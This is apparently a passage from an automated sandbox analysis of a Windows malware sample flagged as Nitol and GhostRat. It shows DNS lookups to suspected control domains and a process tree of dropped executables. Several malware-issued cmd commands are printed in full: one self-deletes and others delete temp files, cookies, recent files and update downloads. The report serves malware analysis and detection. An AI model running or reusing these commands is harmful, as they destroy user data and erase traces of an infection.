                                                                                            Dec 23, 2024 09:01:33.075165033 CET192.168.2.91.1.1.10x3740Standard query (0)www.wk1888.comA (IP address)IN (0x0001)false
                                                                                            Dec 23, 2024 09:01:43.420120001 CET192.168.2.91.1.1.10x673fStandard query (0)www.af0575.comA (IP address)IN (0x0001)false
                                                                                            Dec 23, 2024 09:01:47.859332085 CET192.168.2.91.1.1.10x3bd3Standard query (0)www.af0575.comA (IP address)IN (0x0001)false
                                                                                            Dec 23, 2024 09:01:53.763612032 CET192.168.2.91.1.1.10x61c8Standard query (0)www.fz0575.comA (IP address)IN (0x0001)false
                                                                                            Dec 23, 2024 09:01:58.220653057 CET192.168.2.91.1.1.10x410Standard query (0)www.fz0575.comA (IP address)IN (0x0001)false
                                                                                            Dec 23, 2024 09:02:38.731265068 CET192.168.2.91.1.1.10x672fStandard query (0)chinagov.8800.orgA (IP address)IN (0x0001)false
                                                                                            Dec 23, 2024 09:03:15.948908091 CET192.168.2.91.1.1.10xe1bfStandard query (0)www.wk1888.comA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Dec 23, 2024 09:01:30.498198986 CET1.1.1.1192.168.2.90x90b7No error (0)chinagov.8800.org8.7.198.46A (IP address)IN (0x0001)false
                                                                                            Dec 23, 2024 09:01:30.498219967 CET1.1.1.1192.168.2.90x90b7No error (0)chinagov.8800.org8.7.198.46A (IP address)IN (0x0001)false
                                                                                            Dec 23, 2024 09:01:32.799855947 CET1.1.1.1192.168.2.90x61f8Name error (3)www.wk1888.comnonenoneA (IP address)IN (0x0001)false
                                                                                            Dec 23, 2024 09:01:33.028306007 CET1.1.1.1192.168.2.90x1ee1Name error (3)www.af0575.comnonenoneA (IP address)IN (0x0001)false
                                                                                            Dec 23, 2024 09:01:33.212970972 CET1.1.1.1192.168.2.90x3740Name error (3)www.wk1888.comnonenoneA (IP address)IN (0x0001)false
                                                                                            Dec 23, 2024 09:01:33.213119030 CET1.1.1.1192.168.2.90x2dc8Name error (3)www.fz0575.comnonenoneA (IP address)IN (0x0001)false
                                                                                            Dec 23, 2024 09:01:43.557501078 CET1.1.1.1192.168.2.90x673fName error (3)www.af0575.comnonenoneA (IP address)IN (0x0001)false
                                                                                            Dec 23, 2024 09:01:47.996969938 CET1.1.1.1192.168.2.90x3bd3Name error (3)www.af0575.comnonenoneA (IP address)IN (0x0001)false
                                                                                            Dec 23, 2024 09:01:53.901804924 CET1.1.1.1192.168.2.90x61c8Name error (3)www.fz0575.comnonenoneA (IP address)IN (0x0001)false
                                                                                            Dec 23, 2024 09:01:58.358697891 CET1.1.1.1192.168.2.90x410Name error (3)www.fz0575.comnonenoneA (IP address)IN (0x0001)false
                                                                                            Dec 23, 2024 09:02:39.132702112 CET1.1.1.1192.168.2.90x672fNo error (0)chinagov.8800.org46.82.174.69A (IP address)IN (0x0001)false
                                                                                            Dec 23, 2024 09:03:16.086868048 CET1.1.1.1192.168.2.90xe1bfName error (3)www.wk1888.comnonenoneA (IP address)IN (0x0001)false

                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:03:01:24
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Users\user\Desktop\G3izWAY3Fa.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\G3izWAY3Fa.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:963'286 bytes
                                                                                            MD5 hash:118F7F61B6AFB1DA5E94EA1740222C73
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:2
                                                                                            Start time:03:01:25
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\Temp\v5.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\temp\v5.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:16'896 bytes
                                                                                            MD5 hash:48A02F4A003E8CBE683CF5DADA237168
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 100%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:03:01:25
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\Temp\server.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\temp\server.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:196'608 bytes
                                                                                            MD5 hash:8A953A49796B7F8C7539A6B2BC175397
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: gh0st, Description: unknown, Source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, Author: https://github.com/jackcr/
                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: gh0st, Description: unknown, Source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, Author: https://github.com/jackcr/
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 95%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:false

                                                                                            Target ID:4
                                                                                            Start time:03:01:25
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\Temp\v5.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\temp\v5.exe
                                                                                            Imagebase:0x400000
                                                                                            File size:16'896 bytes
                                                                                            MD5 hash:48A02F4A003E8CBE683CF5DADA237168
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:false

                                                                                            Target ID:5
                                                                                            Start time:03:01:25
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\Temp\ .exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\temp\ .exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:1'429'612 bytes
                                                                                            MD5 hash:CCEE0912E79D434F0D2C1E11274F23C0
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 4%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:false

                                                                                            Target ID:6
                                                                                            Start time:03:01:26
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:7
                                                                                            Start time:03:01:26
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:8
                                                                                            Start time:03:01:31
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\033726\svchost.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\system32\033726\svchost.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:196'608 bytes
                                                                                            MD5 hash:00C090DAE3EE360E575655FE89121D83
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 95%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:false

                                                                                            Target ID:10
                                                                                            Start time:03:01:36
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\034031\svchost.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\system32\034031\svchost.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:196'608 bytes
                                                                                            MD5 hash:B573CCA4145727C22E1AD6774DBF3705
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:11
                                                                                            Start time:03:01:38
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\XXXXXX05CA35CC\svchsot.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\XXXXXX05CA35CC\svchsot.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:196'608 bytes
                                                                                            MD5 hash:8A953A49796B7F8C7539A6B2BC175397
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 95%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:13
                                                                                            Start time:03:01:46
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:196'608 bytes
                                                                                            MD5 hash:00C090DAE3EE360E575655FE89121D83
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:14
                                                                                            Start time:03:01:48
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:15
                                                                                            Start time:03:01:48
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:16
                                                                                            Start time:03:01:48
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:17
                                                                                            Start time:03:01:48
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:18
                                                                                            Start time:03:01:48
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:19
                                                                                            Start time:03:01:48
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:20
                                                                                            Start time:03:01:48
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:21
                                                                                            Start time:03:01:48
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:22
                                                                                            Start time:03:01:48
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:23
                                                                                            Start time:03:01:48
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:24
                                                                                            Start time:03:01:48
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:25
                                                                                            Start time:03:01:48
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:26
                                                                                            Start time:03:01:49
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:27
                                                                                            Start time:03:01:49
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:28
                                                                                            Start time:03:01:51
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:29
                                                                                            Start time:03:01:51
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:30
                                                                                            Start time:03:02:07
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:31
                                                                                            Start time:03:02:07
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:32
                                                                                            Start time:03:02:07
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:33
                                                                                            Start time:03:02:07
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:34
                                                                                            Start time:03:02:07
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:35
                                                                                            Start time:03:02:07
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:36
                                                                                            Start time:03:02:07
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:37
                                                                                            Start time:03:02:07
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:38
                                                                                            Start time:03:02:07
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:39
                                                                                            Start time:03:02:07
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:40
                                                                                            Start time:03:02:08
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:41
                                                                                            Start time:03:02:08
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:42
                                                                                            Start time:03:02:08
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:43
                                                                                            Start time:03:02:08
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
